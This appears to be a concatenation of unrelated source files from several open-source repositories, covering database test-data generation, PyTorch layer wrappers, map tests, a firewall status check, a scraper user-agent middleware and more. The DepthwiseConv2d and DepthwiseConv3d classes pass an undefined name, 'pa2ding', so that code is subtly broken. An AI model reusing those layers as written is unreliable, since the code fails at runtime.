return (0, 4), since that coin is closest.
This map would be represented in our question as:
Our position: (0, 2)
Coins: [(0, 4), (1, 0), (2, 0), (3, 2)]
""" |
script/createTestData/main.py | bitkylin/ClusterDeviceManager | 379 | 12664364 | from utils import device_create
from utils import namecreater
from datetime import datetime
import random
db = device_create.get_creator("172.16.58.3", "bitkyTest")
device = db.Device
employee = db.Employee
device.drop()
employee.drop()
# 生成并插入 device 集合
result = device.insert_many(
[{'GroupId': group_id,
'DeviceId': device_id,
'ChargeStatus': 0,
'WorkStatus': 0,
'ChargeStatusTime': datetime.utcnow(),
'WorkStatusTime': datetime.utcnow(),
'RemainChargeTime': 500,
'CardNumber': hex(random.randint(1, 0xFFFFFFFF))[2:]}
for group_id in range(1, 101)
for device_id in range(1, 101)])
# 从数据库中获取到 device 集合
device_list = [device.find_one({'_id': device_id}) for device_id in result.inserted_ids]
# 插入完整的 employee 并更新为完整的 device
for device_item in device_list:
employee_item = namecreater.random_employee_from_device(device_item)
employee_item_result = employee.insert_one(employee_item)
device.update_one(device_item, {'$set': {'EmployeeObjectId': str(employee_item_result.inserted_id)}})
|
pyntcloud/neighbors/r_neighbors.py | bernssolg/pyntcloud-master | 1,142 | 12664370 | import numpy as np
def r_neighbors(kdtree, r):
""" Get indices of all neartest neighbors with a distance < r for each point
Parameters
----------
kdtree: pyntcloud.structrues.KDTree
The KDTree built on top of the points in point cloud
r: float
Maximum distance to consider a neighbor
Returns
-------
r_neighbors: (N, X) ndarray of lists
Where N = kdtree.data.shape[0]
len(X) varies for each point
"""
return np.array(kdtree.query_ball_tree(kdtree, r))
|
Trakttv.bundle/Contents/Libraries/Shared/exception_wrappers/manager.py | disrupted/Trakttv.bundle | 1,346 | 12664374 | <filename>Trakttv.bundle/Contents/Libraries/Shared/exception_wrappers/manager.py
from pyemitter import Emitter
class ExceptionSource(object):
APSW = 'apsw'
Peewee = 'peewee'
class Manager(Emitter):
def add(self, source, exc_info, name=None):
if not exc_info or len(exc_info) != 3:
raise ValueError('Invalid value provided for the "exc_info" parameter')
# Retrieve error message
message = self._get_message(exc_info[1], name)
# Emit event
self.emit('exception', source, message, exc_info)
def _get_message(self, exception, name=None):
if name:
name_cap = name.capitalize()
else:
name = '<unknown>'
name_cap = '<unknown>'
# Retrieve exception message
ex_message = self._clean_exception_message(exception, exception.message)
# Map exception to a more helpful message
key = '%s.%s' % (
type(exception).__module__,
type(exception).__name__
)
if key == 'exceptions.ImportError':
return 'Unable to import the %s library (%s)' % (name, ex_message)
if key == 'apsw.CantOpenError':
return 'Unable to open %s (%s)' % (name, ex_message)
if key == 'apsw.CorruptError':
return '%s is corrupt (%s)' % (name_cap, ex_message)
if key == 'apsw.FullError':
return 'Drive containing the %s is full (%s)' % (name, ex_message)
if key == 'apsw.IOError':
return '%s raised an input/output error (%s)' % (name_cap, ex_message)
if key == 'apsw.NotADBError':
return '%s doesn\'t have a valid SQLite header (%s)' % (name_cap, ex_message)
if key == 'apsw.PermissionsError':
return 'Access denied to the %s (%s)' % (name, ex_message)
if key == 'apsw.ReadOnlyError':
return 'Unable to write to the %s (%s)' % (name, ex_message)
# Unknown exception
return '<%s> (%s)' % (key, ex_message)
@classmethod
def _clean_exception_message(cls, ex, message):
if not message:
return message
# ImportError
if isinstance(ex, ImportError) and ':' in message and (message.startswith('/') or message.startswith('./')):
# Strip path from message (if it looks like a path)
return message[message.index(':') + 1:].strip().capitalize()
# Strip exception type prefix from message
return message.lstrip(type(ex).__name__ + ':').strip()
# Construct default manager
ExceptionWrapper = Manager()
|
idiot/checks/firewall.py | snare/idiot | 145 | 12664376 | """
Firewall check for Idiot.
"""
import biplist
import idiot
from idiot import CheckPlugin
class FirewallCheck(CheckPlugin):
name = "Firewall"
def run(self):
try:
d = biplist.readPlist('/Library/Preferences/com.apple.alf.plist')
enabled = (d['globalstate'] >= 1)
except:
return (False, "failed to read firewall config plist")
return (enabled, "{}".format("enabled" if enabled else "disabled"))
if __name__ == "__main__":
print(FirewallCheck().run())
|
migrations/versions/5d3c326dd901_add_created_and_updated_date_to_notebook.py | snowdensb/braindump | 631 | 12664377 | """Add Created and Updated date to Notebook
Revision ID: 5d3c326dd901
Revises: <PASSWORD>
Create Date: 2016-08-29 10:39:23.609605
"""
# revision identifiers, used by Alembic.
revision = '5d3c326dd901'
down_revision = '<PASSWORD>'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('notebooks', sa.Column('created_date', sa.DateTime(), nullable=True))
op.add_column('notebooks', sa.Column('updated_date', sa.DateTime(), nullable=True))
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('notebooks', 'updated_date')
op.drop_column('notebooks', 'created_date')
### end Alembic commands ###
|
hata/discord/embed/__init__.py | ToxicKidz/hata | 173 | 12664383 | <gh_stars>100-1000
from .embed import *
from .embed_base import *
from .embed_core import *
__all__ = (
*embed.__all__,
*embed_base.__all__,
*embed_core.__all__,
)
|
pyhashcat/sre_yield/tests/test_fastdivmod.py | security-geeks/hacking-tools | 198 | 12664390 | #!/usr/bin/env python2
#
# Copyright 2011-2014 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import random
import itertools
import unittest
from sre_yield.fastdivmod import divmod_iter_chunking, divmod_iter_basic, powersum
class FastDivmodTest(unittest.TestCase):
def test_divmod_iter_basic(self):
v = divmod_iter_basic(1234, 10)
self.assertEqual([4, 3, 2, 1], list(v))
def test_basics(self):
v = divmod_iter_chunking(1234, 10, 10)
self.assertEqual([4, 3, 2, 1], list(v))
v = divmod_iter_chunking(1234, 10, 100)
self.assertEqual([4, 3, 2, 1], list(v))
v = divmod_iter_chunking(1234, 10, 1000)
self.assertEqual([4, 3, 2, 1], list(v))
def test_bad_chunk_sizes(self):
g = divmod_iter_chunking(1234, 10, 11)
self.assertRaises(ValueError, g.__next__)
def test_huge_number_1(self):
v = divmod_iter_chunking(70110209207109374, 255)
self.assertEqual([254, 254, 254, 254, 254, 254, 254], list(v))
def test_huge_number_2(self):
bignum = 1162523670191533212890624
assert 255**11 > bignum
v = divmod_iter_chunking(bignum, 255, 255**11)
self.assertEqual([254, 254, 254, 254, 254, 254, 254, 254, 254, 254], list(map(int, v)))
assert 255**9 < bignum
v = divmod_iter_chunking(bignum, 255, 255**9)
self.assertEqual([254, 254, 254, 254, 254, 254, 254, 254, 254, 254], list(map(int, v)))
def test_huge_number_3(self):
# this comes from '(?:[a-z]{,100}){,1000}'
bignum = '''
139213503685244597631306906207129822718492493625765750638187
422145221183403064209962632287600238213133585396115931858640
397088297104215182062999160404977511404583694567955555693092
391036971333019826503501322158903350288733318674828830355923
498349990520184425817007399901916816311858669171276285561444
611974044222858238401727502198428055979152449344112286300623
398354626165755088011934430203904483146569680889715180212280
311248065736587077721378474313074197745251681417858985013997
376497357630123665969920348446238536919778668008199819062912
209813948299604964182291901185954692403715976394605180757601
560022975631875217270554188664960698779556224408710087910153
388864065024676909905249179066904314719710199479087036266636
486812383614637270104664243861433698340337270580924018081122
972273102228069375608688078248241826230313720562480029591592
545905659922877348183737039792218885258459176312595646776711
788617588135808104772314342665930082373643028802685991791918
926674139428325541968355964156198980323655477930065908769084
934150892324757190759583195473467803980939672995083413559493
917611589310185589660702265554321021096049823204800056794809
973664250322419064982583391166478099231214825415574566705912
248472806014274543228627658095513550473626381033015045051724
852199012031842402809388416425577314128095191867797687492456
679728567750494783710131249615739065586686514755989308471095
118505256601463774083310772237026000
'''.replace(' ', '').replace('\n', '')
bignum = int(bignum)
bignum2 = 3268647867246256383381332100041691484373976788312974266629140102414955744756908184404049903032490380904202638084876187965749304595652472251350
v = divmod_iter_chunking(bignum, bignum2)
# there are at least 3 terms
next(v)
next(v)
next(v)
for i in v:
pass
# ...and it finishes
def test_correctness_big_numbers():
random.seed(1)
for _ in range(100):
x = random.randint(1, 2**32)
for base in (2, 10, 255, 256):
for chunk in (base, base**2, base**3, base**4):
yield runner, x, base, chunk
for _ in range(10):
x = random.randint(1, 2**32) * sys.maxsize ** 6
for base in (2, 10, 255, 256):
for chunk in (base, base**2, base**3, base**4):
yield runner, x, base, chunk
def runner(x, base, chunk):
for i, j in itertools.zip_longest(divmod_iter_chunking(x, base, chunk), divmod_iter_basic(x, base)):
if i is None:
print("phooey")
else:
assert i == j
def test_powersum():
for base in (1, 2, 7, 256):
yield powersum_runner, base, 0, 0
yield powersum_runner, base, 0, 1
yield powersum_runner, base, 1, 2
yield powersum_runner, base, 1, 10
yield powersum_runner, base, 99, 104
yield powersum_runner, base, 1, 2**14
def powersum_runner(base, low, high):
expected = sum([base ** i for i in range(low, high+1)])
actual = powersum(base, low, high)
assert expected == actual
|
alipay/aop/api/domain/AlipayGongyiModelTest.py | antopen/alipay-sdk-python-all | 213 | 12664403 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.AlipayGongyiUserInfoTest import AlipayGongyiUserInfoTest
class AlipayGongyiModelTest(object):
def __init__(self):
self._buyer = None
self._buyer_email = None
self._price = None
self._seller = None
self._seller_email = None
self._userinfo = None
@property
def buyer(self):
return self._buyer
@buyer.setter
def buyer(self, value):
self._buyer = value
@property
def buyer_email(self):
return self._buyer_email
@buyer_email.setter
def buyer_email(self, value):
self._buyer_email = value
@property
def price(self):
return self._price
@price.setter
def price(self, value):
self._price = value
@property
def seller(self):
return self._seller
@seller.setter
def seller(self, value):
self._seller = value
@property
def seller_email(self):
return self._seller_email
@seller_email.setter
def seller_email(self, value):
self._seller_email = value
@property
def userinfo(self):
return self._userinfo
@userinfo.setter
def userinfo(self, value):
if isinstance(value, AlipayGongyiUserInfoTest):
self._userinfo = value
else:
self._userinfo = AlipayGongyiUserInfoTest.from_alipay_dict(value)
def to_alipay_dict(self):
params = dict()
if self.buyer:
if hasattr(self.buyer, 'to_alipay_dict'):
params['buyer'] = self.buyer.to_alipay_dict()
else:
params['buyer'] = self.buyer
if self.buyer_email:
if hasattr(self.buyer_email, 'to_alipay_dict'):
params['buyer_email'] = self.buyer_email.to_alipay_dict()
else:
params['buyer_email'] = self.buyer_email
if self.price:
if hasattr(self.price, 'to_alipay_dict'):
params['price'] = self.price.to_alipay_dict()
else:
params['price'] = self.price
if self.seller:
if hasattr(self.seller, 'to_alipay_dict'):
params['seller'] = self.seller.to_alipay_dict()
else:
params['seller'] = self.seller
if self.seller_email:
if hasattr(self.seller_email, 'to_alipay_dict'):
params['seller_email'] = self.seller_email.to_alipay_dict()
else:
params['seller_email'] = self.seller_email
if self.userinfo:
if hasattr(self.userinfo, 'to_alipay_dict'):
params['userinfo'] = self.userinfo.to_alipay_dict()
else:
params['userinfo'] = self.userinfo
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayGongyiModelTest()
if 'buyer' in d:
o.buyer = d['buyer']
if 'buyer_email' in d:
o.buyer_email = d['buyer_email']
if 'price' in d:
o.price = d['price']
if 'seller' in d:
o.seller = d['seller']
if 'seller_email' in d:
o.seller_email = d['seller_email']
if 'userinfo' in d:
o.userinfo = d['userinfo']
return o
|
crawler/gather/middlewares.py | shifei123/test | 283 | 12664417 | # -*-coding:utf-8-*-
from scrapy import signals
from scrapy.downloadermiddlewares.useragent import UserAgentMiddleware
import random
class RandomUserAgentMiddleware(UserAgentMiddleware):
def __init__(self, user_agent='Scrapy', user_agent_list=None):
super(RandomUserAgentMiddleware, self).__init__(user_agent=user_agent)
self.user_agent_list = user_agent_list
@classmethod
def from_crawler(cls, crawler):
user_agent_list = crawler.settings.get('USER_AGENT_LIST', None)
if not user_agent_list:
user_agent_file = crawler.settings.get('USER_AGENT_FILE', None)
if user_agent_file:
with open(user_agent_file) as fr:
user_agent_list = fr.readlines()
o = cls(crawler.settings['USER_AGENT'], user_agent_list)
crawler.signals.connect(o.spider_opened, signal=signals.spider_opened)
return o
def process_request(self, request, spider):
if isinstance(self.user_agent_list, tuple) and len(self.user_agent_list) > 0:
user_agent = random.choice(self.user_agent_list)
else:
user_agent = self.user_agent
request.headers.setdefault(b'User-Agent', user_agent)
|
roll_engine/models/batches.py | js882829/tars | 371 | 12664431 | <reponame>js882829/tars<filename>roll_engine/models/batches.py
from __future__ import absolute_import
from django.db import models
from roll_engine.fsm import BatchFSMixin
from roll_engine.mixins import BatchMixin
from roll_engine.exceptions import DeploymentError
from .base import FSMedModel, InheritanceMetaclass
class DeploymentBatch(BatchMixin, BatchFSMixin, FSMedModel):
__metaclass__ = InheritanceMetaclass
index = models.IntegerField(null=True)
pause_time = models.IntegerField(default=0)
FORT_INDEX = 1
class Meta:
abstract = True
@classmethod
def validate_meta(cls):
pass
def get_object(self):
return self
def is_fort_batch(self):
raise DeploymentError('return boolean to indicate whether a fort batch')
def save(self, *args, **kwargs):
if self.pk is None:
if self.deployment is not None:
self.pause_time = self.deployment.config.pause_time
super(DeploymentBatch, self).save(*args, **kwargs)
def is_reach_up_server_threshold(self):
return False
|
sky130/custom/scripts/sp_to_spice.py | d-m-bailey/open_pdks | 103 | 12664449 | <filename>sky130/custom/scripts/sp_to_spice.py
#!/usr/bin/env python3
#
# sp_to_spice ---
#
# This script runs as a filter to foundry_install.sh and converts file
# names ending with ".sp" to ".spice". If the file has multiple extensions
# then all are stripped before adding ".spice".
#
# This script is a filter to be run by setting the name of this script as
# the value to "filter=" for the model install in the sky130 Makefile.
import os
import sys
def filter(inname):
filepath = os.path.split(inname)[0]
filename = os.path.split(inname)[1]
filebits = filename.split('.')
newname = filebits[0] + '.spice'
outname = os.path.join(filepath, newname)
if not os.path.isfile(inname):
print('No such file ' + inname)
return 1
print('Renaming file ' + filename + ' to ' + newname)
os.rename(inname, outname)
return 0
if __name__ == '__main__':
# This script expects to get one argument, which is the input file.
# The script renames the file.
options = []
arguments = []
for item in sys.argv[1:]:
if item.find('-', 0) == 0:
options.append(item[1:])
else:
arguments.append(item)
if len(arguments) > 0:
infilename = arguments[0]
else:
sys.exit(1)
result = filter(infilename)
sys.exit(result)
|
torchfusion/layers/layers.py | fbremer/TorchFusion | 250 | 12664478 | import torch.nn as nn
import torch
import torch.nn.functional as F
from torchfusion.initializers import *
from torch.nn.modules.conv import _ConvNd,_ConvTransposeMixin,_single,_pair,_triple
from torch.nn.modules.batchnorm import _BatchNorm
class MultiSequential(nn.Sequential):
def __init__(self, *args):
super(MultiSequential, self).__init__(*args)
def forward(self, *input):
for module in self._modules.values():
input = module(*input)
return input
class Conv1d(nn.Conv1d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(Conv1d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, dilation, groups, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class Conv2d(nn.Conv2d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(Conv2d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, dilation, groups, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class Conv3d(nn.Conv3d):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(Conv3d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, dilation, groups, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConv1d(nn.Conv1d):
def __init__(self, in_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,multiplier=1,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(DepthwiseConv1d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
padding, dilation, in_channels, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConv2d(nn.Conv2d):
def __init__(self, in_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,multiplier=1,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(DepthwiseConv2d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
pa2ding, dilation, in_channels, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConv3d(nn.Conv3d):
def __init__(self, in_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True,multiplier=1,weight_init=Kaiming_Normal(),bias_init=Zeros()):
super(DepthwiseConv3d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
pa2ding, dilation, in_channels, bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class ConvTranspose1d(nn.ConvTranspose1d):
def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(ConvTranspose1d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, output_padding, groups, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class ConvTranspose2d(nn.ConvTranspose2d):
def __init__(self,in_channels, out_channels, kernel_size, stride=1,padding=0, output_padding=0, groups=1, bias=True, dilation=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(ConvTranspose2d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, output_padding, groups, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class ConvTranspose3d(nn.ConvTranspose3d):
def __init__(self,in_channels, out_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(ConvTranspose3d,self).__init__(in_channels, out_channels, kernel_size, stride,
padding, output_padding, groups, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConvTranspose1d(nn.ConvTranspose1d):
def __init__(self,in_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,multiplier=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(DepthwiseConvTranspose1d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
padding, output_padding, in_channels, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConvTranspose2d(nn.ConvTranspose2d):
def __init__(self,in_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,multiplier=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(DepthwiseConvTranspose2d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
padding, output_padding, in_channels, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class DepthwiseConvTranspose3d(nn.ConvTranspose3d):
def __init__(self,in_channels, kernel_size, stride=1, padding=0, output_padding=0, groups=1, bias=True, dilation=1,multiplier=1,weight_init=Kaiming_Normal(), bias_init=Zeros()):
super(DepthwiseConvTranspose3d,self).__init__(in_channels, in_channels*multiplier, kernel_size, stride,
padding, output_padding, in_channels, bias, dilation)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class Linear(nn.Linear):
def __init__(self,in_features,out_features,bias=True,weight_init=Xavier_Normal(),bias_init=Zeros()):
"""
:param in_features:
:param out_features:
:param bias:
:param weight_init:
:param bias_init:
"""
super(Linear,self).__init__(in_features,out_features,bias)
if weight_init is not None:
weight_init(self.weight.data)
if bias and bias_init is not None:
bias_init(self.bias.data)
class Flatten(nn.Module):
def __init__(self,batch_first=True):
"""
:param batch_first:
"""
super(Flatten,self).__init__()
self.batch_first = batch_first
def forward(self,inputs):
if self.batch_first:
size = torch.prod(torch.LongTensor(list(inputs.size())[1:])).item()
return inputs.view(-1,size)
else:
size = torch.prod(torch.LongTensor(list(inputs.size())[:len(inputs.size())-1])).item()
return inputs.view(size,-1)
class Reshape(nn.Module):
def __init__(self,output_shape,batch_first=True):
"""
:param output_shape:
:param batch_first:
"""
super(Reshape,self).__init__()
self.output_shape = output_shape
self.batch_first = batch_first
def forward(self,inputs):
if isinstance(self.output_shape,int):
size = [self.output_shape]
else:
size = list(self.output_shape)
if self.batch_first:
input_total_size = torch.prod(torch.LongTensor(list(inputs.size())[1:])).item()
else:
input_total_size = torch.prod(torch.LongTensor(list(inputs.size())[:len(inputs.size())-1])).item()
target_total_size = torch.prod(torch.LongTensor(size)).item()
if input_total_size != target_total_size:
raise ValueError(" Reshape must preserve total dimension, input size: {} and output size: {}".format(input.size()[1:],self.output_shape))
size = list(size)
if self.batch_first:
size = tuple([-1] + size)
else:
size = tuple(size + [-1])
outputs = inputs.view(size)
return outputs
class _GlobalPoolNd(nn.Module):
def __init__(self,flatten=True):
"""
:param flatten:
"""
super(_GlobalPoolNd,self).__init__()
self.flatten = flatten
def pool(self,input):
"""
:param input:
:return:
"""
raise NotImplementedError()
def forward(self,input):
"""
:param input:
:return:
"""
input = self.pool(input)
size_0 = input.size(1)
return input.view(-1,size_0) if self.flatten else input
class GlobalAvgPool1d(_GlobalPoolNd):
def __init__(self,flatten=True):
"""
:param flatten:
"""
super(GlobalAvgPool1d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_avg_pool1d(input,1)
class GlobalAvgPool2d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalAvgPool2d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_avg_pool2d(input,1)
class GlobalAvgPool3d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalAvgPool3d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_avg_pool3d(input,1)
class GlobalMaxPool1d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalMaxPool1d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_max_pool1d(input, 1)
class GlobalMaxPool2d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalMaxPool2d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_max_pool2d(input, 1)
class GlobalMaxPool3d(_GlobalPoolNd):
def __init__(self, flatten=True):
"""
:param flatten:
"""
super(GlobalMaxPool3d,self).__init__(flatten)
def pool(self, input):
return F.adaptive_max_pool3d(input, 1)
class RNNBase(nn.RNNBase):
def __init__(self,mode, input_size, hidden_size,
num_layers=1, bias=True, batch_first=False,
dropout=0, bidirectional=False,weight_init=None):
"""
:param mode:
:param input_size:
:param hidden_size:
:param num_layers:
:param bias:
:param batch_first:
:param dropout:
:param bidirectional:
:param weight_init:
"""
super(RNNBase,self).__init__(mode, input_size, hidden_size,
num_layers, bias, batch_first, dropout,bidirectional)
if weight_init is not None:
for weight in super(RNNBase, self).parameters():
weight_init(weight)
class RNN(RNNBase):
def __init__(self, *args, **kwargs):
"""
:param args:
:param kwargs:
"""
if 'nonlinearity' in kwargs:
if kwargs['nonlinearity'] == 'tanh':
mode = 'RNN_TANH'
elif kwargs['nonlinearity'] == 'relu':
mode = 'RNN_RELU'
else:
raise ValueError("Unknown nonlinearity '{}'".format(
kwargs['nonlinearity']))
del kwargs['nonlinearity']
else:
mode = 'RNN_TANH'
super(RNN, self).__init__(mode, *args, **kwargs)
class GRU(RNNBase):
def __init__(self, *args, **kwargs):
"""
:param args:
:param kwargs:
"""
super(GRU, self).__init__('GRU', *args, **kwargs)
class LSTM(RNNBase):
def __init__(self, *args, **kwargs):
"""
:param args:
:param kwargs:
"""
super(LSTM, self).__init__('LSTM', *args, **kwargs)
class Swish(nn.Module):
def __init__(self):
super(Swish, self).__init__()
def forward(self, inputs):
return inputs * torch.sigmoid(inputs)
class GroupNorm(nn.GroupNorm):
def __init__(self, *args,weight_init=None,bias_init=None):
"""
:param args:
:param weight_init:
:param bias_init:
"""
super(GroupNorm,self).__init__(*args)
if weight_init is not None:
weight_init(self.weight.data)
if bias_init is not None:
bias_init(self.bias.data)
class LayerNorm(nn.LayerNorm):
def __init__(self, *args,weight_init=None,bias_init=None):
"""
:param args:
:param weight_init:
:param bias_init:
"""
super(LayerNorm,self).__init__(*args)
if weight_init is not None:
weight_init(self.weight.data)
if bias_init is not None:
bias_init(self.bias.data)
class Embedding(nn.Embedding):
def __init__(self,num_embeddings, embedding_dim, padding_idx=None,
max_norm=None, norm_type=2, scale_grad_by_freq=False,
sparse=False, _weight=None,weight_init=None):
"""
:param num_embeddings:
:param embedding_dim:
:param padding_idx:
:param max_norm:
:param norm_type:
:param scale_grad_by_freq:
:param sparse:
:param _weight:
:param weight_init:
"""
super(Embedding,self).__init__(num_embeddings, embedding_dim, padding_idx,
max_norm, norm_type, scale_grad_by_freq,
sparse, _weight)
if weight_init is not None:
weight_init(self.weight.data)
class BatchNorm(_BatchNorm):
def __init__(self,num_features, eps=1e-5, momentum=0.1, affine=True,
track_running_stats=True,weight_init=None,bias_init=None):
"""
:param num_features:
:param eps:
:param momentum:
:param affine:
:param track_running_stats:
:param weight_init:
:param bias_init:
"""
super(BatchNorm,self).__init__(num_features, eps, momentum,affine,
track_running_stats)
if weight_init is not None:
weight_init(self.weight.data)
if bias_init is not None:
bias_init(self.bias.data)
class BatchNorm1d(BatchNorm):
def _check_input_dim(self, input):
if input.dim() != 2 and input.dim() != 3:
raise ValueError('expected 2D or 3D input (got {}D input)'
.format(input.dim()))
class BatchNorm2d(BatchNorm):
def _check_input_dim(self, input):
if input.dim() != 4:
raise ValueError('expected 4D input (got {}D input)'
.format(input.dim()))
class BatchNorm3d(BatchNorm):
def _check_input_dim(self, input):
if input.dim() != 5:
raise ValueError('expected 5D input (got {}D input)')
|
chapter10-图像描述(Image Caption)/config.py | 1364354238/PYTORCH_LEARNING | 137 | 12664498 | <filename>chapter10-图像描述(Image Caption)/config.py
#coding:utf8
class Config:
caption_data_path='caption.pth'# 经过预处理后的人工描述信息
img_path='/home/cy/caption_data/'
# img_path='/mnt/ht/aichallenger/raw/ai_challenger_caption_train_20170902/caption_train_images_20170902/'
img_feature_path = 'results.pth' # 所有图片的features,20w*2048的向量
scale_size = 300
img_size = 224
batch_size=8
shuffle = True
num_workers = 4
rnn_hidden = 256
embedding_dim = 256
num_layers = 2
share_embedding_weights=False
prefix='checkpoints/caption'#模型保存前缀
env = 'caption'
plot_every = 10
debug_file = '/tmp/debugc'
model_ckpt = None # 模型断点保存路径
lr=1e-3
use_gpu=True
epoch = 1
test_img = 'img/example.jpeg'
|
nuplan/common/maps/nuplan_map/test/test_intersection.py | motional/nuplan-devkit | 128 | 12664501 | from typing import Any, Dict
import pytest
from nuplan.common.actor_state.state_representation import Point2D
from nuplan.common.maps.abstract_map import SemanticMapLayer
from nuplan.common.maps.abstract_map_objects import Intersection
from nuplan.common.maps.nuplan_map.map_factory import NuPlanMapFactory
from nuplan.common.maps.test_utils import add_map_objects_to_scene
from nuplan.common.utils.testing.nuplan_test import NUPLAN_TEST_PLUGIN, nuplan_test
from nuplan.database.tests.nuplan_db_test_utils import get_test_maps_db
maps_db = get_test_maps_db()
map_factory = NuPlanMapFactory(maps_db)
@nuplan_test(path='json/intersections/on_intersection.json')
def test_get_intersections(scene: Dict[str, Any]) -> None:
"""
Test getting intersections at a point.
"""
nuplan_map = map_factory.build_map_from_name(scene["map"]["area"])
for marker, expected_id in zip(scene["markers"], scene["xtr"]["expected_nearest_id"]):
pose = marker["pose"]
intersection: Intersection = nuplan_map.get_one_map_object(
Point2D(pose[0], pose[1]), SemanticMapLayer.INTERSECTION
)
assert intersection is not None
assert expected_id == intersection.id
assert intersection.contains_point(Point2D(pose[0], pose[1]))
add_map_objects_to_scene(scene, [intersection])
@nuplan_test(path='json/intersections/nearby.json')
def test_get_nearby_intersection(scene: Dict[str, Any]) -> None:
"""
Test getting nearby crosswalks.
"""
nuplan_map = map_factory.build_map_from_name(scene["map"]["area"])
for marker, expected_distance, expected_id in zip(
scene["markers"], scene["xtr"]["expected_nearest_distance"], scene["xtr"]["expected_nearest_id"]
):
pose = marker["pose"]
intersection_id, distance = nuplan_map.get_distance_to_nearest_map_object(
Point2D(pose[0], pose[1]), SemanticMapLayer.INTERSECTION
)
assert intersection_id is not None
assert expected_distance == distance
assert expected_id == intersection_id
intersection: Intersection = nuplan_map.get_map_object(intersection_id, SemanticMapLayer.INTERSECTION)
add_map_objects_to_scene(scene, [intersection])
if __name__ == "__main__":
raise SystemExit(pytest.main([__file__], plugins=[NUPLAN_TEST_PLUGIN]))
|
tools/linux/tk2bar.py | sz6636/DataCore | 144 | 12664511 | <reponame>sz6636/DataCore
from tkreader import TkReader
import pandas as pd
import numpy as np
import datetime as dt
import traceback
from test._mock_backport import inplace
bar_fields = ['date', 'trade_date', 'time', 'volume_inc', 'turnover_inc', 'settle', 'oi',
'open', 'high', 'low', 'close', 'volume', 'turnover',
'askprice1', 'askprice2', 'askprice3', 'askprice4', 'askprice5',
'bidprice1', 'bidprice2', 'bidprice3', 'bidprice4', 'bidprice5',
